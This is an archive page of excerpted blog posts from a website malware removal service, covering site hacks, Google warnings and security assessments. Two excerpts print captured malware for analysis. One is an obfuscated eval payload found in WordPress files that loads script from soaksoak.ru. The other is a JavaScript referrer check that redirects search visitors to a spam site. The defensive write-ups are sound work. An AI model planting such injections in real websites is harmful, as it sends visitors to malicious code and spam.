The following metadata has been embedded in the body. Tips and Information Archives – Website Malware Removal Service

Security News and Information

Category: Tips and Information

VisitorTracker Malware – way beyond just JavaScript files

Posted by MalRemServ on 26 09 2015. 1 Comment on VisitorTracker Malware – way beyond just JavaScript files

Over the past couple of weeks, we’ve seen a fairly new malware show up in sites. It doesn’t appear to be specific to any one type of cms or website which would point to some type of ‘other’ vulnerability such as a compromised FTP, cPanel or other unknown issue. We…

Have you been Hacked by Hwins2005 ?

Posted by MalRemServ on 27 08 2015. 0 Comments

When you visit your site, do you automatically see “Hacked by Hwins2005”, if so, you’ve been hacked. This type of hack is a SQLi and we will walk you through the basic way to detect it, and how to fix.First, if you see this on your site, do a view…

“This Site May be Hacked” – increase in detections

Posted by MalRemServ on 16 02 2015. 1 Comment on “This Site May be Hacked” – increase in detections

Today we’ve seen an increase in websites that Google has labeled with “This Site May be Hacked”. Apparently it looks like a change in the way they detect and label these sites. It is important to note that this label is completely different that the dreaded blocked “malware warning”.Google displays…

WordPress soaksoak{.}ru – something new?

Posted by MalRemServ on 15 12 2014. 0 Comments

Today we came across several wordpress sites with something we hadn’t come across yet. It was hidden quite well in the wp-includes directory. They used the template-loader.php file to load up wp-includes/swfobject.js which had the following nasty bit in it, which then redirected users to soaksoak[.]ru:eval( decodeURIComponent( ‘%28%66%75%6E%63%74%69%6F%6E%28%29%20%7B%20%76%61% 72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74% 2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54% 61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B% 30%5D%3B%20%76%61%72%20%73%63%72%69%70%74%3D% 64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65% 45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74% 27%29%3B%20%73%63%72%69%70%74%2E%74%79%70%65% 3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69% 70%74%27%3B%20%73%63%72%69%70%74%2E%73%72%63%3D%27%68%74%74%70%3A %2F%2F%73%6F%61%6B%73%6F%61%6B%2E%72%75%2F%78%74%65%61%73%2F%63%6F %64%65%27%3B%20%73%63%72%69%7 0%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B %27%3B%20%68%65%61%64%2E%61%70% 70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%20%7D%28%29%29%3B’ ) )…

How to scan an HTTP password protected area

Posted by Nicholas Sciberras on 29 10 2014. 0 Comments

There are 2 types of password protected areas: HTTP Password protected areas: These are generally managed by the web server, and the user is prompted with a password dialog. Form-based restricted areas: This type of authentication is handled by the web application. The credentials are requested using a web form.…

Common Network Security Assessment Oversights

Posted by Kevin Beaver on 28 07 2014. 0 Comments

Network security assessments are one of the most critical exercises performed for minimizing business risks. Your time is limited. You’ve got pressure from management to get things done. There’s so much to do and not enough time to do it. … [+] The post Common Network Security Assessment Oversights appeared first…

Making Web Security Part of your IT Governance Program

Posted by Kevin Beaver on 23 07 2014. 0 Comments

Moving past IT compliance, IT “governance” is becoming the new area of focus in enterprises today. With compliance often being a more tactical business function, IT governance tends to operate at a higher level, especially in larger organizations. Internal audit, … [+] The post Making Web Security Part of your IT…

sneaky social.png is not your friend – it contains malware!

Posted by MalRemServ on 15 04 2014. 1 Comment on sneaky social.png is not your friend – it contains malware!

Over the past week we came across a couple instances of interesting malware that was not easily detected. We called it the sneaky social.png. It’s not really an image – if you were to open it up with a text editor, you would more than likely see this:< ? php…

Website Redirects using document.referrer

Posted by MalRemServ on 15 04 2014. 0 Comments

Towards the beginning of the year we saw several spam hacks that used an injected JavaScript redirect; it typically looks like the following:var s=document. referrer; if(s.indexOf(“google”)>0 || s.indexOf(“bing”)>0 || s.indexOf(“yahoo”)>0 || s.indexOf (“aol”)>0){ self.location=’http: // targetsite[.]com’; }When it appears on Windows based servers (which is…

Server hit with Operation Windigo?

Posted by MalRemServ on 20 03 2014. 0 Comments

The researchers at ESET discovered that approximately 25,000 Unix/Linux servers were highjacked by a backdoor trojan. The have provided a detailed technical overview which you can download from their site.How do you know if you’ve been affected by this? You can run the following command:$ ssh -G 2>&1 |…